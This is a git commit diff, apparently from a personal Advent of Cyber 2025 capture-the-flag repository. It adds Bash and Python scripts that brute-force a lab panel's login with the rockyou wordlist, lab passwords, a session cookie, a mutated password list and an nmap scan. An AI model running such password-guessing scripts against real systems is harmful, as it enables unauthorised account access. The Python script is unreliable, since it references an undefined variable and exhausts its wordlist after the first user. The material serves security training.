2026-03-11

2026-03-11 10:56:27 +01:00
parent 1b6dfea090
commit 0e30222666
37 changed files with 4467 additions and 0 deletions
--- a/AoC/2025/14/deploy_user_pass.txt
+++ b/AoC/2025/14/deploy_user_pass.txt
@@ -0,0 +1 @@
+DeployMaster2025
--- a/AoC/2025/21/NorthPole.zip
+++ b/AoC/2025/21/NorthPole.zip
--- a/AoC/2025/21/NorthPolePerformanceReview.hta
+++ b/AoC/2025/21/NorthPolePerformanceReview.hta
--- a/AoC/2025/21/zip_pass.txt
+++ b/AoC/2025/21/zip_pass.txt
@@ -0,0 +1 @@
+CanYouREM3?
--- a/AoC/2025/24/.bruteforce.sh.swp
+++ b/AoC/2025/24/.bruteforce.sh.swp
--- a/AoC/2025/24/bruteforce.sh
+++ b/AoC/2025/24/bruteforce.sh
@@ -0,0 +1,10 @@
+for word in $(cat /usr/share/wordlists/rockyou.txt); do
+	response=$(curl -s -A "secretcomputer" -X POST -d "username=admin&password=$word" http://10.82.144.99/terminal.php?action=login)
+	#echo $response
+	status=$(echo $response | jq -e ".status" | tr -d '"')
+	printf "Checking %s with status %s               \r" "$word" "$status"
+	if [ "$status" != "fail" ]; then
+		echo "Credentials are admin:$word"
+		break
+	fi
+done
--- a/AoC/2025/24/cookie.txt
+++ b/AoC/2025/24/cookie.txt
@@ -0,0 +1,5 @@
+# Netscape HTTP Cookie File
+# https://curl.se/docs/http-cookies.html
+# This file was generated by libcurl! Edit at your own risk.
+
+10.82.144.99	FALSE	/	FALSE	0	PHPSESSID	r6grvo93glp6pc1ocqkvfrcelp
--- a/AoC/2025/24/username.py
+++ b/AoC/2025/24/username.py
@@ -0,0 +1,49 @@
+import requests
+import json
+import os
+
+#{
+#    "service": "Wormhole Control Panel",
+#    "endpoints": {
+#        "\/terminal.php?action=info": "Public info",
+#        "\/terminal.php?action=login": "POST: username,password",
+#        "\/terminal.php?action=pin": "POST: attempt PIN to get temporary admin token",
+#        "\/terminal.php?action=status": "GET: wormhole status",
+#        "\/terminal.php?action=close": "POST: close wormhole"
+#    },
+#    "note": "This panel only answers to terminal user agents. Use the endpoints to fully close the wormhole."
+#}  
+
+def main():
+    wordlist = "/usr/share/wordlists/rockyou.txt"
+    url = "10.81.152.59"
+    proto = "http"
+    target = "terminal.php?action=login"
+    user_agent = "secretcomputer"
+    headers = {"User-Agent": user_agent}
+    username = ["user", "admin"]
+
+    lines = int(os.popen(f"wc -l {wordlist}").read().split()[0])
+    print(lines)
+    count = 0
+
+    try:
+        with open(wordlist, 'r') as file:
+            for user in username:
+                for word in file:
+                    count += 1
+                    print(f"Bruteforce in progress: {count/2/lines:0.000000f}%", end="\r")
+                    data = {"username": user, "password": word}
+                    response = requests.post(f"{proto}://{url}/{target}", data=data, headers=headers).json()
+                    if isinstance(response, dict):
+                        if response["status"] != "fail":
+                            print(f"Credentials found: {user}:{password}")
+    except FileNotFoundError:
+        print("File not found")
+        return
+    except Exception as e:
+        print(f"An Error occured: {e}")
+        return
+
+if __name__ == "__main__":
+    main()
--- a/AoC/2025/24/username.txt
+++ b/AoC/2025/24/username.txt
@@ -0,0 +1,2 @@
+user
+admin
--- a/AoC/2025/sq1/base_wordlist.txt
+++ b/AoC/2025/sq1/base_wordlist.txt
@@ -0,0 +1,33 @@
+Johnnyboy1982!
+Johnnyboy1982@
+Johnnyboy1982#
+Johnnyboy1982$
+Johnnyboy1982%
+Johnnyboy1982^
+Johnnyboy1982&
+Johnnyboy1982*
+Johnnyboy1982(
+Johnnyboy1982)
+Johnnyboy1982-
+Johnnyboy1982_
+Johnnyboy1982+
+Johnnyboy1982=
+Johnnyboy1982~
+Johnnyboy1982`
+Johnnyboy1982[
+Johnnyboy1982]
+Johnnyboy1982{
+Johnnyboy1982}
+Johnnyboy1982|
+Johnnyboy1982\
+Johnnyboy1982:
+Johnnyboy1982;
+Johnnyboy1982"
+Johnnyboy1982'
+Johnnyboy1982<
+Johnnyboy1982>
+Johnnyboy1982,
+Johnnyboy1982.
+Johnnyboy1982?
+Johnnyboy1982/
+Johnnyboy1982 
--- a/AoC/2025/01/sideQuest/combined_wordlist.txt
+++ b/AoC/2025/01/sideQuest/combined_wordlist.txt
--- a/AoC/2025/01/sideQuest/facebook_pass.txt
+++ b/AoC/2025/01/sideQuest/facebook_pass.txt
--- a/AoC/2025/01/sideQuest/gobuster_scan_small.txt
+++ b/AoC/2025/01/sideQuest/gobuster_scan_small.txt
--- a/AoC/2025/01/sideQuest/guard.txt
+++ b/AoC/2025/01/sideQuest/guard.txt
--- a/AoC/2025/01/sideQuest/nmap_scan.txt
+++ b/AoC/2025/01/sideQuest/nmap_scan.txt
--- a/AoC/2025/01/sideQuest/nmap_scan1.nmap
+++ b/AoC/2025/01/sideQuest/nmap_scan1.nmap
--- a/AoC/2025/01/sideQuest/passwords.txt
+++ b/AoC/2025/01/sideQuest/passwords.txt
--- a/AoC/2025/01/sideQuest/passwords_cewl.txt
+++ b/AoC/2025/01/sideQuest/passwords_cewl.txt
--- a/AoC/2025/01/sideQuest/passwords_con.txt
+++ b/AoC/2025/01/sideQuest/passwords_con.txt
--- a/AoC/2025/01/sideQuest/passwords_con.txt.cupp.txt
+++ b/AoC/2025/01/sideQuest/passwords_con.txt.cupp.txt
--- a/AoC/2025/01/sideQuest/posts.html
+++ b/AoC/2025/01/sideQuest/posts.html
--- a/AoC/2025/sq2/4.2.0.zip
+++ b/AoC/2025/sq2/4.2.0.zip
--- a/AoC/2025/sq2/gobuster.txt
+++ b/AoC/2025/sq2/gobuster.txt
--- a/AoC/2025/sq2/latest/beacon.bin
+++ b/AoC/2025/sq2/latest/beacon.bin
--- a/AoC/2025/sq2/nmap-scan.txt
+++ b/AoC/2025/sq2/nmap-scan.txt
@@ -0,0 +1,70 @@
+# Nmap 7.95 scan initiated Tue Dec  9 19:51:33 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap-scan.txt 10.82.170.160
+Nmap scan report for 10.82.170.160
+Host is up (0.041s latency).
+Not shown: 65531 closed tcp ports (reset)
+PORT      STATE SERVICE VERSION
+22/tcp    open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   256 f6:ad:e2:2c:8b:d4:f6:f8:1d:47:c8:56:81:ca:f0:86 (ECDSA)
+|_  256 2d:c7:95:46:a2:df:45:9d:bc:8a:5c:a7:2f:a6:4f:23 (ED25519)
+80/tcp    open  http    Apache httpd 2.4.58 ((Ubuntu))
+|_http-server-header: Apache/2.4.58 (Ubuntu)
+|_http-title: Under Construction
+9004/tcp  open  unknown
+| fingerprint-strings: 
+|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, RPCCheck, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
+|     Payload Storage Malhare's
+|     Version 4.2.0
+|     >>Invalid option
+|   GenericLines, NULL: 
+|     Payload Storage Malhare's
+|_    Version 4.2.0
+21337/tcp open  http    Werkzeug httpd 3.0.1 (Python 3.12.3)
+|_http-server-header: Werkzeug/3.0.1 Python/3.12.3
+|_http-title: Unlock Hopper's Memories
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port9004-TCP:V=7.95%I=7%D=12/9%Time=69386FDC%P=aarch64-unknown-linux-gn
+SF:u%r(NULL,46,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]
+SF:\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>")%r(JavaRMI,55,"Paylo
+SF:ad\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U
+SF::\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(GenericLines,46,
+SF:"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\
+SF:]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>")%r(GetRequest,55,"Payload\x20Sto
+SF:rage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\
+SF:x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(HTTPOptions,55,"Payload\x
+SF:20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\
+SF:[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(RTSPRequest,55,"Payl
+SF:oad\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20
+SF:U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(RPCCheck,55,"Pa
+SF:yload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x
+SF:20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(DNSVersionBin
+SF:dReqTCP,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\
+SF:x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r
+SF:(DNSStatusRequestTCP,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\
+SF:.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x2
+SF:0option\n")%r(Help,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2
+SF:\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20o
+SF:ption\n")%r(SSLSessionReq,55,"Payload\x20Storage\x20Malhare's\nVersion\
+SF:x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Inval
+SF:id\x20option\n")%r(TerminalServerCookie,55,"Payload\x20Storage\x20Malha
+SF:re's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\
+SF:x20E:\n>>Invalid\x20option\n")%r(TLSSessionReq,55,"Payload\x20Storage\x
+SF:20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\
+SF:n\[4\]\x20E:\n>>Invalid\x20option\n")%r(Kerberos,55,"Payload\x20Storage
+SF:\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D
+SF::\n\[4\]\x20E:\n>>Invalid\x20option\n");
+Device type: general purpose
+Running: Linux 4.X
+OS CPE: cpe:/o:linux:linux_kernel:4.15
+OS details: Linux 4.15
+Network Distance: 3 hops
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 80/tcp)
+HOP RTT      ADDRESS
+1   43.94 ms 192.168.128.1
+2   ...
+3   44.79 ms 10.82.170.160
+
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Tue Dec  9 19:52:26 2025 -- 1 IP address (1 host up) scanned in 52.64 seconds